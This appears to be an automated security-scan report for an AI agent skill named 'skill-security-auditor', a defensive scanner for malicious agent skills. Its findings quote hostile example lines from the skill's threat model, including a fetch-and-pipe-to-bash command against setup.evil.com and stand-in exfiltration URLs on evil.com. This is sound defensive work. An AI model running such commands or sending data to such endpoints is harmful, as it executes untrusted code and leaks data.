Trusted: risk score 5/100
Last scanned: 1 day ago
skill-security-auditor
Security audit and vulnerability scanner for AI agent skills before installation
The Skill Security Auditor is a legitimate defensive security tool that scans AI agent skills for malicious patterns. All flagged IOCs are documented attack patterns used for detection examples, not actual malicious code.
Skill name: skill-security-auditor
Analysis time: 35.4s
Engine: pi
Can be installed
This skill is safe to install. It is a security auditing tool designed to detect the very patterns it appears to contain as examples in its threat model documentation.
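| Resource type | Declared permission | Inferred permission | Status | Evidence |
|---|---|---|---|---|
| Filesystem | NONE | READ | ✓ Consistent | Uses Path.read_text() for scanning skill files (line 447) |
| Network access | NONE | READ | ✓ Consistent | Subprocess git clone only; no direct network requests in scanner |
| Command execution | NONE | READ | ✓ Consistent | Safe subprocess usage only |
| Environment variables | NONE | NONE | | No environment variable access |
| Skill invocation | NONE | NONE | | No skill invocation capabilities |
| Clipboard | NONE | NONE | | No clipboard access |
| Browser | NONE | NONE | | No browser capabilities |
| Database | NONE | NONE | | No database access |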
2 critical, 6 findings

Critical | Dangerous command | Dangerous shell command
curl ... \| sh
references/threat-model.md:55

Critical | Dangerous command | Dangerous shell command
curl -s https://setup.evil.com/init.sh | bash
references/threat-model.md:190

Medium | External URL | External URL
https://evil.com/collect
SKILL.md:116

Medium | External URL | External URL
https://analytics.evil.com/log?d=
references/threat-model.md:162

Medium | External URL | External URL
https://setup.evil.com/init.sh
references/threat-model.md:190

Medium | External URL | External URL
https://evil.com/ping\\\
references/threat-model.md:212

Directory structure

3 files · 55.2 KB · 1491 lines
Python 1f · 1049L Markdown 2f · 442L
├─ 📁 references
│ └─ 📝 threat-model.md Markdown 271L · 9.9 KB
├─ 📁 scripts
│ └─ 🐍 skill_security_auditor.py Python 1049L · 37.7 KB
└─ 📝 SKILL.md Markdown 171L · 7.7 KB

Security highlights

✓ Uses safe subprocess.run() with capture_output=True and no shell=True
✓ Comprehensive pattern detection for 50+ attack vectors
✓ Scans for prompt injection including hidden characters and HTML comments
✓ Includes typosquatting detection for 15+ popular packages
✓ Filesystem scanning for hidden files, binaries, symlinks, and SUID bits
✓ Detailed remediation guidance for each finding
✓ Supports both local directory and git repo auditing
✓ Clean separation between documentation (threat model examples) and actual code